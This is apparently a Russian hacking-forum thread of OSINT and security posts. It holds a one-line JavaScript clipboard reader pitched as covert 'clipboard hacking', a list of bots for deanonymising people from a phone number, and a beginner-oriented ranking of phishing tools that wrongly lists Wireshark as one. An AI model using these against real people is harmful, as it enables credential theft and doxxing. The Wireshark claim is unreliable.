navigator.clipboard.readText().then(clipText => document.write(clipText));
Теперь вы можете успешно выполнить взлом буфера обмена и прочитать данные без ведома жертвы.
Поскольку вы видели, как работает взлом, то вам наверняка стало интересно, как защитить свои данные.
Ниже приведены советы, которые вам помогут обезопасить себя от подобного взлома.
1) Обновите свой браузер:
Вы должны обновлять свой браузер каждый раз, когда доступна новая версия. Мы также рекомендуем загрузить и использовать несколько браузеров, чтобы обеспечить максимально безопасную работу в Интернете. Чтобы проверить версию вашего браузера, щелкните значок шестеренки в меню настроек (три точки, расположенные вертикально друг над другом) в правом верхнем углу, затем щелкните параметр справки и пункт «О Google Chrome». Откроется новая вкладка, и вы увидите последнюю версию Google Chrome, установленную в вашей системе.
2) Удаляйте данные из буфера обмена после использования:
Есть много способов очистить данные буфера обмена вручную в операционной системе Windows. Самый простой способ — нажать «Windows + V», вы увидите данные буфера обмена в правом углу. Нажмите «Очистить все» или «Удалить определенные записи».
На этом все. Соблюдайте меры безопасности и используйте инструмент с умом. Удачного взлома!
BlackMAST
21.04.2023, 10:22
Seekr - новый мультизадачный инструмент для OSINT
https://i.gyazo.com/7f5c02f674db33988abd54d48a21f64d.jpg
Вступить в наш чат Хотите собрать информацию о человеке, но поиск и анализ данных отнимают слишком много времени и сил? Сегодня мы расскажем, как упростить этот процесс с помощью нового инструмента - Seekr. Независимо от того, являетесь ли вы специалистом по OSINT, кибер-разведчиком или новичком, желающим попробовать себя в этом деле, Seekr упрощает поиск необходимых данных и управление ими.
https://i.gyazo.com/3202bdea677d2ba45f21a56ddb353579.png
Преимущества Seekr
Seekr сочетает в себе ведение заметок и OSINT в одном приложении. Он разработан и оптимизирован с учетом всех потребностей для OSINT. Seekr можно использовать вместе с другими приложениями, так как он станет отличным дополнением вашего разведческого инструментария.
Ключевая особенность:База данных для OSINT;
GitHub для отправки по электронной почте;
Учетные карточки для каждого человека в базе данных;
Обнаружение аккаунта, интеграция с карточками аккаунта.
https://i.gyazo.com/7202705bf44daf1cba0452de8733660e.png
Установка
Windows
Загрузите последний exe здесь
Linux (стабильная версия)
Загрузите файл отсюда
Linux (нестабильная)
Чтобы установить Seekr в Linux, просто запустите:
git clone https://github.com/seekr-osint/seekr
cd seekr
go run main.go
Теперь откройте веб-интерфейс в выбранном вами браузере.
Запуск на NixOS
Seekr создан с учетом NixOS и поэтому поддерживает nix flakes. Чтобы запустить Seekr в NixOS, выполните следующие команды:
nix shell github:seekr-osint/seekr
seekr
Начало работыjourney
title How to Intigrate seekr into your current workflow.
section Initial Research
Create a person in seekr: 100: seekr
Simple web research: 100: Known tools
Account scan: 100: seekr
section Deeper account investigation
Investigate the accounts: 100: seekr, Known tools
Keep notes: 100: seekr
section Deeper Web research
Deep web research: 100: Known tools
Keep notes: 100: seekr
section Finishing the report
Export the person with seekr: 100: seekr
Done.: 100
ЗаключениеSeekr — это удобный набор инструментов с простым интерфейсом, который может упростить ваш рабочий процесс и сделать его более эффективным. Он позволяет легко находить, систематизировать и управлять нужными данными. В целом, если вы ищете мультизадачный инструмент OSINT, который сочетает в себе ведение заметок и управление данными в одном месте, то Seekr определенно заслуживает вашего внимания.
BlackMAST
21.04.2023, 10:38
https://i.gyazo.com/0a11628d4275753000960449e274255d.jpg
Вступить в наш чат
Что вы знаете о «глубокой сети»? Что там обитают хакеры, а обычным пользователям лучше держаться подальше от этого места? Тогда вы можете быть удивлены, узнав, что пользуетесь глубокой сетью каждый день. На самом деле, термин «глубокая сеть» часто путают с двумя другими словами «dark web» и «darknet».
Если вы ни раз слышали эти понятия, но до сих пор не можете отличить одно от другого, то настало время наконец-то разобраться в этом. Поехали!
https://i.gyazo.com/0be9d37abcec3c8a684a051b9ae44dc5.jpg
Весь интернет можно условно поделить на 2 части, подобно большому айсбергу.
Верхушка айсберга
Surface Web
Surface Web (Поверхностная или видимая сеть) — это сеть, которую мы используем изо дня в день. Мы все погружены в поверхностную паутину. Именно здесь происходит наша повседневная онлайн-деятельность и то, что большинство людей считают Интернетом. Это общедоступные бесплатные сайты, не требующие регистрации и установки каких-то специальных программ, которые можно посетить с помощью любого браузера.
Подводная часть
Подводная часть делится еще на 2 уровня:
Deep Web
Верхний уровень называется «глубокий Интернет» (Deep Web). К нему относятся веб-сайты, требующие верификации личности, ресурсы, которые невозможно найти, используя поисковики типа Google, или закрытые страницы. Вы отметили в профиле ВКонтакте, что хотите скрыть его от поисковиков? Сайт требует ввести капчу? Статья доступна только по подписке? Если что-то открыть все же можно, а найти — нельзя, то это тоже deep web.
Darknet
Нижний уровень — это темный анонимный Интернет (DarkNet). Обычному пользователю войти туда не помогут ни прямая ссылка, ни пароль. Узлы каждого отдельно взятого даркнета — серверы, компьютеры, роутеры — не видны не только поисковикам, но и большинству браузеров, поскольку для передачи данных внутри такой сети используются нестандартные протоколы. Доступ возможен только через специализированное программное обеспечение, например, Tor Browser, I2P, Freenet и т. д.
Вместе даркнеты составляют dark web (темный веб) — ту часть deep web, которая свободна от цензуры, никем не контролируется и не регулируется, поэтому привлекательна для многих темных личностей.
Разница между Deep Web и Dark Web
Вот основные различия между темной и глубокой сетью:
https://i.gyazo.com/ace30de4a7a5ac542fee58151f91952c.jpg
Безопасность
Теперь вы знаете, что данные, хранящиеся в «глубокой сети» являются безвредными, просто там они находятся в безопасности, «в глубине», незаметно для тех, кому они не предназначены. Вот если некоторые из них, например частная переписка, «всплывут на поверхность» и попадут в поисковый индекс, тогда начнутся проблемы. Поэтому лучше как следует защищать свой спрятанные кусочек айсберга — аккаунты и документы, к которым у вас есть доступ:
Используйте уникальные и надежные пароли;
Перед тем как вводить учетные данные, всегда проверяйте, где именно вы собираетесь это сделать. Например, если адрес страницы написан с ошибкой, то это верный признак того, что сайт является фишинговым;
С осторожностью загружайте файлы и программы, так как некоторые из них содержат вредоносное ПО;
Не предоставляйте доступ к конфиденциальным данным третьим лицам;
Не бродите по темной сети, если не уверены в своей безопасности. Неизвестно на кого там можно нарваться.
BlackMAST
28.04.2023, 10:17
https://i.gyazo.com/fdddd04ba63d736df54f53238261b055.jpg
Вступить в наш чат
В наши дни онлайн-угрозы становятся все более изощренными и непредсказуемыми. Для расследования киберпреступлений и борьбы с ними требуется ряд методов и инструментов, одним из которых является OSINT IP-адреса. Этот мощный метод включает в себя использование аналитики из открытых источников для сбора информации об IP-адресах, включая выявление угроз, отслеживание киберпреступников и раскрытие вредоносной активности.
В этой статье мы расскажем, как работает OSINT IP-адреса, а также поделимся советами и рекомендациями по проведению эффективных и безопасных расследований.
https://i.gyazo.com/b5b3d0f4f56a403e8acf77ca34b8536e.jpg
Что такое IP-адрес
IP-адрес — это уникальный числовой идентификатор, который присваивается устройству, подключенному к Интернету. Он состоит из двух компонентов: идентификатора сети и идентификатора хоста. Адреса IPv4 являются наиболее распространенным типом и состоят из четырех наборов чисел, разделенных точками, в то время как адреса IPv6 используют более длинный и сложный формат.
https://i.gyazo.com/5094cd3db69af1ee9a53c5e0254501d8.jpg
Адреса IPv4 — это наиболее распространенный тип IP-адресов, состоящий из четырех чисел, разделенных точками, например 192.168.0.1. Адреса IPv6 наоборот состоят из более длинной последовательности цифр и букв, разделенных двоеточиями. Например: 2001:0db8:85a3:0000:0000:8a2e:0370:7334.
Также важно понимать, что IP-адреса могут быть динамическими или статическими. Динамические IP-адреса периодически меняются, в то время как статические IP-адреса остаются неизменными, если их не поменять вручную.
Инструменты для OSINT IP-адреса
Существует несколько инструментов для проведения OSINT-расследований. Для каждого OSINT расследователя важно выбрать правильные инструменты под свои конкретные нужды.
Whois — это протокол, используемый для поиска информации о доменных именах, IP-адресах и других сетевых ресурсах. Используя инструмент поиска Whois, вы можете собирать информацию об IP-адресах, включая организацию, которой принадлежит блок IP-адресов, и контактную информацию администратора сети.
https://i.gyazo.com/819248765f8fead5cf6a89db2c761c8c.png
Инструмент GeoIP позволяет определить геолокацию IP-адреса и его физическое местоположение. Это может быть полезно для отслеживания киберпреступников, которые могут действовать из определенного местоположения.
https://i.gyazo.com/0e39ad2e79ecd6ce53d5239b0d348b77.png
Инструмент обратного поиска Reverse Lookup можно использовать для определения доменного имени, связанного с IP-адресом. Он помогает выявлять вредоносные домены, связанные с определенным IP-адресом.
https://i.gyazo.com/ba3ce32eb4166b1a839b30d1293a7977.png
hodan — это поисковая система, которая специализируется на сканировании устройств, подключенных к Интернету, включая серверы, маршрутизаторы и устройства IoT. Выполняя поиск IP-адресов или другой сетевой информации в Shodan, можно обнаружить уязвимые устройства, которые могут быть подвержены взлому.
https://i.gyazo.com/cdc01ebaf0f1256c917c68d304e7b79e.png
Maltego — популярный инструмент для анализа данных, используемый в расследованиях OSINT. С помощью него вы можете визуализировать и анализировать сложные наборы данных, включая информацию об IP-адресах, в удобном для вас интерфейсе.
https://i.gyazo.com/26e067b32341c03c9b2573971f0ce724.png
Сбор информации с IP-адреса
OSINT IP-адреса может предоставить ценную информацию для расследования киберпреступлений. Собирая информацию об IP-адресах, вы можете выявить потенциальных участников киберугроз и выследить киберпреступников, а также обнаружить вредоносную активность, например, источник фишинговой атаки.
В дополнение к вышеупомянутым преимуществам сбора информации с IP-адресов, есть и другие способы, которыми OSINT IP-адреса может быть полезен для специалистов по кибербезопасности:
Выявление скомпрометированных систем. Исследователи могут обнаруживать системы, в которых наблюдается подозрительная активность, путем анализа сетевого трафика, связанного с IP-адресом. Этот анализ может помочь в предотвращении кибератаки.
Проведение разведки угроз.С помощью OSINT IP-адреса специалисты по кибербезопасности собирают информацию о потенциальных киберугрозах. Они могут идентифицировать IP-адреса, связанные с известными вредоносными программами или группами киберпреступников, а также отслеживать распространение кибератак по разным сетям.
Отслеживание источника кибератак.Благодаря инструментам для OSINT IP-адреса можно отслеживать источник кибератак и идентифицировать лиц или организации, ответственные за них. Эта информация может быть использована для создания дела против киберпреступников и помощи правоохранительным органам в их расследованиях.
Таким образом, сбор информации с IP-адресов является важной частью расследования киберугроз и защиты от кибератак.
Использование IP-адреса для цифровой криминалистики
Цифровая криминалистика — это практика сбора, анализа и сохранения электронных данных для расследования киберпреступления. OSINT IP-адреса может быть ценным инструментом, поскольку он позволяет отслеживать источник кибератак и находить доказательства.
Вот несколько способов использования OSINT IP-адреса в цифровой криминалистике:
Выявление вредоносного ПО. Анализируя сетевой трафик, связанный с IP-адресом, возможно не только выявить вредоносным ПО, но и отследить его источник. Это может помочь в определении масштабов кибератаки и ее предотвращении.
Отслеживание киберпреступников. Используя OSINT IP-адреса, специалисты по кибербезопасности могут определить источник кибератаки и, возможно, отследить ответственных лиц. Эта информация может оказаться бесценной в судебных разбирательствах и возбуждении дела против киберпреступников.
Расследование утечек данных. Эксперты могут использовать OSINT IP-адреса для расследования утечек данных и определения того, как произошла утечка. Анализируя сетевой трафик, связанный с IP-адресом, они могут выявить потенциальные уязвимости в системе и принять меры для предотвращения будущих нарушений.
Советы для проведения OSINT IP-адреса
При проведении OSINT-расследований IP-адресов важно следовать некоторым рекомендациям:
Используйте безопасные инструменты. Убедитесь, что инструменты, которые вы используете для OSINT IP-адреса, заслуживают доверия. Ищите инструменты, проверенные экспертами по кибербезопасности и имеющие надежную репутацию.
Защитите личную информацию.При проведении OSINT-расследований IP-адресов будьте осторожны, чтобы не раскрыть свою личность. Используйте VPN или другое безопасное соединение, чтобы защитить свою информацию. Не используйте личные учетные записи — например, электронную почту или профили в социальных сетях для расследования.
Проверьте свои источники.Дважды проверьте информацию, которую вы собираете с IP-адресов, чтобы убедиться, что она точна и надежна. Используйте несколько источников для подтверждения своих выводов и не полагайтесь только на один источник информации.
Заключение
OSINT IP-адреса — это мощный инструмент для расследования киберпреступлений и борьбы с ними. Собирая информацию об IP-адресах, эксперты могут выявлять потенциальных участников угроз, отслеживать киберпреступнико
BlackMAST
01.05.2023, 12:25
Что твой номер телефона расскажет о тебе?— OSINT
https://i.gyazo.com/cb34429729c8bf6b0eb4f56b9d22e8eb.jpg
Вступить в наш чат
Современные реалии таковы, что телефонные номера стали неотъемлемой частью повседневной жизни. Пользователи указывают свои номера в социальных сетях, на сайтах объявлений и в различных интернет-магазинах, но они не подозревают, что делают себя легкой добычей для хакеров и мошенников. OSINT по номеру телефона становится все более популярным методом сбора ценной информации о человеке. Вы не ослышались, всего лишь 11 цифр телефона могут быть использованы для деанона пользователя. В этой статье мы рассмотрим различные методы и инструменты, используемые для OSINT по номеру телефона.
https://i.gyazo.com/3f7144c6a41736550fe69ecd01bfba77.jpg
Что может рассказать номер телефона
Одним из первых шагов в проведении OSINT по номеру телефона является сбор информации о самом телефоне. Это может включать определение оператора связи, местоположения и модель телефона. Для сбора этой информации можно использовать онлайн-сервисы. С их помощью вы можете получить важную информацию о привычках человека, например, о том, где он живет и работает.
Номера телефонов также можно использовать для поиска профилей в социальных сетях. Так, в Facebook, Instagram и ВК можно быстро найти учетную запись человека, включив поиск по контактам (предварительно нужно занести номер в свой телефон). Как только учетная запись будет идентифицирована, вы сможете собрать дополнительную информацию об онлайн-активности и интересах человека.
Номера телефонов также можно использовать для поиска в общедоступных базах данных. Например, использовать номер телефона для поиска судебных записей, ИП и других документов. Все это может дать ценную информацию о судимости человека, финансовом положении и других аспектах его личной и профессиональной жизни.
Инструменты OSINT
Существует множество способов пробива по номеру телефона. Вот некоторые инструменты, которые можно использовать для OSINT по номеру телефона:
1. Truecaller
https://i.gyazo.com/6336b566a56ba7b87d9a026284a89eff.jpg
2. Microsoftпоз*воля*ет про*верять при*вяз*ку номера к акка*унту на сай*те account.live.com.
https://i.gyazo.com/53e51106cd1e1fd7ddb87b0929b27d2f.jpg
3.@bmi_np_bot — по номеру телефона определяет регион и оператора, включая новые номера.
https://i.gyazo.com/76ad2fb3302398b2f1ab58b92c89bff3.jpg
4. @getfb_bot — выдает привязанную к номеру телефона страницу в Facebook.
https://i.gyazo.com/14b28818a1957492d5a8f487800214bb.jpg
5. @get_kontakt_bot — найдет как записан номер в контактах, имеет большую базу контактов.
https://i.gyazo.com/bfcd0af3591eee1a4c4b4d82aa60be90.jpg
6. nuga.app — поиск страницы Instagram по номеру. При первом сканировании найденная страница предоставляется сразу, но при последующих поисках нужно будет подписаться на соцсети создателей.
https://i.gyazo.com/21cfaf40112f06267ed34e69c1f77a82.jpg
7.pipl.com — полезный ресурс для поиска человека по номеру телефона в самых популярных соц. сетях. Несмотря на то что сайт платный, есть пробный период.
https://i.gyazo.com/5da0045d7a6d4d21c7c69d4d057b94ca.jpg
Заключение
OSINT телефонного номера — это действенный способ деанона человека. Используя комбинацию инструментов и методов, разведчики могут раскрыть огромное количество информации о личной и профессиональной жизни пользователя. Будьте предельно внимательны и не указывайте информацию в социальных сетях, которая поможет вас идентифицировать. Не облегчайте сбор информации мошенниками и различным сборщикам телефонных баз.
BlackMAST
04.05.2023, 13:42
OSINT домена. Собираем информацию о сайте
https://i.gyazo.com/d844586dee3575eac80018e86c5b7797.jpg
Вступить в наш чат
В эпоху роста цифровых технологий нельзя недооценивать киберпреступность, которая уже стала серьезной угрозой как для отдельных лиц, так для предприятий и даже правительства. Как правило, любая хакерская атака начинается с поиска информации о цели, а некоторые атаки на этом этапе и заканчиваются. В этом цифровом хаосе важно обезопасить себя, и в случае чего первым нанести удар. Однако, для этого необходимо обладать знаниями и инструментами для поиска из открытых источников.
Сегодня мы рассмотрим такое понятие, как OSINT доменного имени, а также различные инструменты и методы, которые могут использоваться для сбора информации о сайте.
https://i.gyazo.com/ee677951987a8930e56679a54a1b4c52.jpg
Что такое домен
Прежде чем углубиться в OSINT домена, важно иметь общее представление о том, что значит доменное имя.
Доменное имя — это адрес, который пользователи вводят в адресной строке браузера для доступа к сайту или, проще говоря, это адрес сайта в Интернете. Например, доменное имя Google — «google.com».
https://i.gyazo.com/e50b81fb8ed2943962f0e1f4505bad8e.jpg
Доменные имена состоят из двух частей: домен верхнего уровня (TLD) и домен второго уровня (SLD). TLD — это часть доменного имени, которая стоит после последней точки, например «.ru», «.com» или «.net». SLD — это часть доменного имени, которая стоит перед TLD, например, «google» в приведенном выше примере.
В дополнение к TLD и SLD доменные имена также могут содержать поддомены, которые представляют собой дополнительные разделы, предшествующие SLD. Например, «mail.google.com» является субдоменом «google.com». Субдомены часто используются для сортировки разделов сайта или для создания иерархии контента.
OSINT домена
OSINT домена — это процесс сбора и анализа информации из открытых источников о конкретном домене (сайте). Домен OSINT может использоваться для сбора ценной информации о возможных атаках, уязвимостях и угрозах, нацеленных на какую-то организацию.
Инструменты для домена OSINT
Теперь, когда мы ознакомились с основами доменных имен, давайте рассмотрим различные инструменты для проведения OSINT-разведок.
WHOIS.net и DomainTools
Инструменты, позволяющий искать информацию о доменном имени, включая регистрационные данные и контактную информацию владельца домена.
https://i.gyazo.com/6de8eaf51e72c9f4bf2565cf01dbfadc.jpg
DomainTools, SecurityTrails и DomainTools Iris
Инструменты истории домена, которые позволяют отслеживать изменения прав собственности и истории домена, включая изменения в записях DNS, IP-адресах и SSL-сертификатах.
https://i.gyazo.com/7fd23805e34df3cb22b907ed6a5e6a90.jpg
SSLShopper и SSL Labs
Инструменты поиска SSL-сертификатов. С помощью этих инструментов можно искать сертификаты SSL, связанные с определенным доменным именем. SSL-сертификаты могут предоставить ценную информацию о владельце веб-сайта и помочь выявить вредоносную активность.
https://i.gyazo.com/0a5f5c51c8c025d512a20682325711c5.jpg
ViewDNS, Nslookup и DNSstuff
Инструменты поиска DNS могут запрашивать систему доменных имен (DNS) для получения информации об IP-адресе доменного имени, почтовых серверах и другой информации.
https://i.gyazo.com/d6d5347bac86b2c143b020700ea72b96.png
Каждый из этих инструментов имеет свои сильные и слабые стороны, и для успешной разведки вам потребуется использовать комбинацию этих инструментов для сбора всех необходимых данных.
Советы по проведению OSINT домена
Теперь, когда мы знаем об инструментах для OSINT-расследований, давайте посмотрим, как выжить максимум из разведки и предостеречь себя от опасности. Ниже приведены рекомендации, о которых следует помнить:
Используйте надежные инструменты: при проведении OSINT-расследований домена важно использовать безопасные инструменты, которые защищают ваши данные и личную информацию.
Защитите свои данные: будьте осторожны, когда проводите OSINT разведку, чтобы не раскрыть свою личную информацию. Используйте псевдонимы и избегайте использования личного адреса электронной почты или номера телефона.
Используйте несколько источников: не полагайтесь исключительно на один инструмент или базу данных. Важно использовать несколько источников информации.
Оставайтесь в курсе новостей: киберпреступники постоянно совершенствуют свои тактики, поэтому важно быть в курсе последних событий, новейших тенденций и технологий.
Заключение
В заключение хотелось бы отметить, что OSINT домена является одним из самых важных способов получения данных о конкретном сайте. Собирая информацию о доменных именах, вы можете выявлять источник угроз, отслеживать киберпреступников и собирать данные о конкурентах. Для проведения эффективных и безопасных OSINT-расследований важно следовать передовым методам и использовать безопасные инструменты, о которых мы вам и рассказываем. На этом все. Удачи!
BlackMAST
08.05.2023, 11:17
Кибербезопасность: что грозит вашему компьютеру
https://i.gyazo.com/b2b19fe9d154ee23f8a28db5d2e0b4ef.jpg
Вступить в наш чат
За последние пару лет значительно возросло напряжение в киберпространстве, в том числе за счёт роста рынка киберпреступности. Только за 2022 год количество инцидентов стало больше на 21%. Согласно мнению экспертов, объем и сложность атак с каждым годом увеличиваются в геометрической прогрессии.
Знание того, как идентифицировать компьютерные угрозы является первым шагом на пути к вашей безопасности. В этой статье мы познакомим вас с распространенными киберугрозами и с тем, как вы можете защититься от них.
https://i.gyazo.com/a3d6ea796a8fc9775562b7ef956c8690.jpg
Что такое киберугроза
Киберугроза - угроза незаконного проникновения в виртуальном пространстве с целью хищения ценных данных. Киберугроза может привести к:
Потере или повреждению системных данных;
Незаконному мониторингу ваших действий в Сети;
Краже конфиденциальной информации.
Виды киберугроз
Ниже представлен список распространенных киберугроз:
Вирус;
Троян;
Червь;
Шпионское ПО;
Кейлоггер;
Рекламное ПО;
Атака «отказ в обслуживании» (DoS);
Фишинг.
Советы по кибербезопасности
Чтобы защитить компьютерные системы от вышеупомянутых угроз, важно комплексно подходить к этой проблеме. Используя все нижеуказанные меры безопасности, можно предотвратить, либо существенно снизить риск кибератаки.
https://i.gyazo.com/0cfaf1d10a06c2f8e555a72a0df89b03.jpg
1 Настройте двухфакторную аутентификацию. Двухфакторная аутентификация создает дополнительный уровень безопасности для защиты данных. Злоумышленнику будет недостаточно знать данные для входа — ему также потребуется ваш телефон или другая информация.
2 Используйте VPN. Каждый раз, когда вы подключаетесь к Сети через обычное соединение вы рискуете своей безопасностью. А если вы используете общедоступные Wi-Fi-соединения, например, в кофейне или коворкинге, то вы рискуете вдвойне. Такие соединения незащищены, и это означает, что трафик, идущий к устройствам, может быть перехвачен хакерами. Чтобы обезопасить свою личную информацию, важно использовать виртуальную частную сеть (VPN). Она зашифрует весь интернет-трафик и даст гарантию, что любые данные будут защищены от киберпреступников.
3Грамотное управление паролями. Использование одних и тех же неизменных паролей – серьезный промах в вашей безопасности. Необходимо устанавливать уникальный, а главное сложный пароль для каждой учетной записи.
4 Не пренебрегайте качественным антивирусом. Для защиты от вирусов, троянов, червей и т.п. нужно использовать антивирусное программное обеспечение.
5 Регулярное обновление ОС и ПО. Причина, по которой операционные системы и программное обеспечение регулярно обновляются разработчиками, заключается в том, что они вносят исправления ошибок и создают новые патчи, способные защитить любые обнаруженные уязвимости. Не обновляя операционную систему и программное обеспечение по мере необходимости, вы оставляете бреши в системе безопасности.
6 Выполните тестирование на проникновение. Существует ряд инструментов для проверки ваших устройств на наличие уязвимостей. Проанализируйте результаты и внесите необходимые улучшения, чтобы сделать их более безопасными.
7 Делайте резервное копирование (бэкап). Это спасет от вирусов-вымогателей, которые удаляют ваши данные с ПК, а затем хакеры требует за них выкуп. С бэкапом вы всегда сможете быть уверенным, что ваши данные не пропадут бесследно.
Заключение
Обеспечение кибербезопасности — это непрерывный процесс, который нельзя прекращать ни на одну минуту и который требует постоянной вовлеченности на всех уровнях. Для защиты своих данных важно применять все необходимые действия, начиная с регулярного обновления ПО и заканчивая установкой надежного пароля. Поскольку число и сложность кибеугроз постоянно увеличивается, советуем оставаться в курсе новостей, следя за нашими статьями. На этом все. Удачи!
BlackMAST
11.05.2023, 10:51
Топ-10 фишинговых инструментов всех времен
https://i.gyazo.com/c4516c533cd2410681f436f1f8295145.jpg
Вступить в наш чат
Возможно, вы уже ни раз сталкивались с фишингом и знаете, что существует множество способов для создания поддельных сайтов. Но так ли они все хороши? Сегодня мы подготовили для вас 10 лучших бесплатных инструментов с открытым исходным кодом, которые вам обязательно понравятся.
https://i.gyazo.com/09f4c719e6ba1407f1779a6f82b2b56b.png
Прежде чем перейти к практической части, давайте освежим ваши знания о фишинге и о том, как он работает. Ну а если вы уже профи в этом деле, то переходите сразу к инструментам.
Фишинг. Почему такое название
Фишинг — это метод взлома, при котором злоумышленник создаёт поддельный сайт в точности как настоящий, при этом жертва, попадая на такой сайт, сливает свои личные данные. Фишинг — один из старейших, но наиболее эффективных методов взлома. Если раньше хакеру требовалось вручную создавать фишинговую страницу, то теперь за вас это делает специальная программа, что делает процесс взлома ещё более доступным даже для новичка.
Слово "фишинг" в переводе на английский означает "рыбачить". Такое название появилось не с проста, так как вы подобной рыбаку делаете приманку, а затем бросаете ее в воду, в ожидании того, что рыба клюнет.
Готовы поймать рыбку?
Данная статья предоставлена исключительно в образовательных целях. Мы не несём ответственности за любые ваши действия.
Делаем приманку
С помощью инструментом возможно сделать фишинг максимально доступным. В основном инструменты фишинга применяются по трем причинам:
1) Простота в использовании;
2) Вы можете поймать много «рыбы»;
3) Любой пользователь может использовать фишинг без предварительных знаний в области программирования или скриптов.
Топ лучших инструментов1. Ghost Phisher
Ghost Phisher — это программа для аудита безопасности и взлома Wi-Fi, написанная с использованием языка программирования Python и библиотеки графического интерфейса Python Qt. Ghost Phisher на данный момент поддерживает и интернет-хостинг веб-страницы и регистратор учетных данных (фишинг).
2.SPF (SpeedPhish Framework)
Еще одна программа на Python или просто инструмент для фишинга, созданный Адамом Комптоном. SPF состоит из множества опций, которые позволяют быстро настроить и провести эффективные фишинговые атаки. Помимо этого, инструмент имеет множеством других приятных опций (например, сбор адресов электронной почты).
3.Phishing Frenzy
Это инструмент для фишинга электронной почты. Хотя Phishing Frenzy разработан для тестирования на проникновение, он имеет множество опций, которые сделают фишинг максимально простым. Однако, Phishing Frenzy разработан на базе ОС Linux, с настройкой которой у новичка могут возникнуть трудности.
4.Gophish
Будучи фишинговой платформой с открытым исходным кодом, Gophish — это отличный вариант для начинающих фишеров. Инструмент может похвастаться простой настройкой: скачайте и извлеките ZIP-папку. Также он имеет легкий и интуитивно понятный интерфейс, а опции, хотя и ограничены, детально продуманы.
5.sptoolkit Rebirth
Хотя инструмент не имеет привлекательного интерфейса, у него есть другая существенная характеристика, которая ставит его наравне с другими в нашем рейтинге. Инструмент сочетает фишинг с безопасностью. А также имеет ряд обучающих видео, которые будут полезны новичку.
6.LUCY
Инструмент для пентестинга и фишинга. LUCY представляет собой удобную платформу, имеющую красивый интерфейс (хотя и немного сложный). Однако, некоторые необходимые параметры недоступны в бесплатной версии.
7.King Phisher
С King Phisher от SecureState мы попадаем в класс более совершенных инструментов фишинга. King Phisher Toolkit недоступен ни на одном веб-сайте, а только в Linux, поэтому убедитесь, что вы загружаете его только из Github. Возможности King Phisher многочисленны, включая одновременный запуск нескольких атак, просмотр геолокации жертв и многое другое. Пользовательский интерфейс понятен и удобен.
8. SpearPhisher Beta
SpearPhisher разработан для новичков и представляет собой программу для Windows с простым графическим интерфейсом. Это означает, что вы можете быстро создать фишинговое электронное письмо с нужными полями, а также можете отправить созданный имейл нескольким жертвам одновременно.
9.Wireshark: Phishing Tools
Wireshark — передовой в мире инструмент для фишинга. Wireshark поставляется с графическими инструментами для визуализации статистики, что упрощает анализ результатов.
10.Metasploit: Phishing Tools
Новый Metasploit от поставщика систем безопасности Rapid7 делает шаг вперед по сравнению с предыдущими версиями, предоставляя новый механизм фишинга и современные модули эксплойтов.
Заключение
Существует множество инструментов для фишинга, каждый из которых имеет свои уникальные функции. Однако, все они прекрасно справляются с поставленной задачей, а значит выбор инструмента зависит от ваших целей и знаний в области фишинга. На этом все. Удачной «рыбалки»!
BlackMAST
25.05.2023, 13:37
https://i.gyazo.com/7836f6517872920cf1e598dd7805dd12.jpg
Вступить в наш чат
Количество киберугроз, как и ущерб от хакерских атак, растет с каждым годом. По экспертным оценкам, потери от киберпреступлений достигнут $10,5 трлн в 2025 году. Поэтому на сегодняшний день важно противостоять кибератакам как на уровне государства, так и на уровне каждого пользователя за счет соблюдения необходимых шагов на пути к вашей кибербезопасности. В этой статье мы продолжаем расследовать кибератаки с помощью OSINT.
Прежде чем мы начнем, убедитесь, что вы прочитали нашу первую часть, где мы подробно рассказали про расследования таких киберпреступлений, как атаки программ-вымогателей, кражу личных данных, вредоносные ПО и социальную инженерию.
Взлом и утечка данных
https://i.gyazo.com/773400046c172706c82adb71b4356e2d.jpg
Взлом и утечка данных — это киберпреступления, связанные с несанкционированным доступом к компьютеру и кражей конфиденциальной информации. С помощью OSINT можно выявлять источники взломов и утечек данных, выслеживать лиц, стоящих за ними.
Ниже приведены подходящие инструменты для расследования взломов и утечек данных:
Have I Been Pwned: бесплатный онлайн-сервис, который позволяет вам проверить, была ли ваша электронная почта причастна к утечкам данным.
Shodan: поисковая система для подключенных к Интернету устройств, которую можно использовать для выявления уязвимостей.
Censys: поисковая система с тем же принципом работы, что и Shodan.
Hunter.io: инструмент для поиска адресов электронной почты, связанных с определенным доменным именем, который может быть полезен для выявления возможных хакерских атак.
TheHarvester: инструмент для сбора адресов электронной почты, субдоменов и другой информации, которая может быть полезна для выявления потенциальных уязвимостей.
Фишинг
https://i.gyazo.com/e92934a412c727fec83c0b8cb9237f9e.jpg
Фишинг — это распространенный вид мошенничества, при котором злоумышленники создают поддельный сайт в точности как настоящий, при этом жертва, попадая на такой сайт, сливает свои личные данные. С помощью OSINT вы можете анализировать заголовки электронной почты, доменного имени и содержимого сообщения. Кроме того, вы можете использовать специальные инструменты для выявления фишинговых доменов и анализа их активности.
В этом вам помогут следующие инструменты:
PhishTank: обширная база данных известных фишинговых URL-адресов.
Maltego: инструмент интеллектуального анализа с целью нахождения взаимосвязей между данными.
VirusTotal: инструмент для проверки файлов или URL-адресов на наличие вредоносных программ.
Google Safe Browsing: сервис для проверки URL-адресов на предмет потенциальных фишинговых атак.
WHOIS Lookup: инструмент для идентификации владельца доменного имени.
Интернет-мошенничество
https://i.gyazo.com/3529ed87db72277a1dc4ad753a8bf5b0.jpg
Интернет-мошенничество может принимать различные формы, включая поддельные интернет-магазины, махинации с инвестициями и т.д. Прежде всего, при расследовании онлайн-мошенничества разведчики могут использовать OSINT для анализа веб-сайтов, профилей в социальных сетях. Точно так же они могут выявлять поддельные веб-сайты и профили и анализировать финансовые транзакции на предмет подозрительной активности, используя такие инструменты, как:
FraudRecord: платформа для отслеживания мошенников.
Scamadviser: инструмент для проверки репутации сайтов и интернет-продавцов.
Trustpilot: платформа для проверки рейтинга компаний.
Интернет-буллинг
https://i.gyazo.com/bc67b330c1f516d83950f3350235ccde.jpg
Онлайн-буллинг может принимать различные формы, включая сообщения с угрозами, нежелательные контакты и доксинг. Анализируя онлайн-активность злоумышленника, профили в социальных сетях и каналы связи с помощью OSINT можно отследить преследователя и остановить буллинг. Для поиска личной информации злоумышленника и анализа его онлайн-активности пригодятся инструменты:
Поиск Google: найдите онлайн-профили, сообщения или изображения, связанные с преследователем.
Social Catfish: поиск учетных записей людей в социальных сетях по электронной почте, номеру телефона или имени пользователя.
Tineye: инструмент обратного поиска изображений, чтобы найти, где еще в Интернете было размещено изображение.
StalkScan: инструмент для сбора информации о страницах на Facebook.
Maltego: инструмент интеллектуального анализа для визуализации взаимосвязей между данными, который может помочь определить связи между преследователем и жертвой.
Атаки типа «отказ в обслуживании» (DDoS)
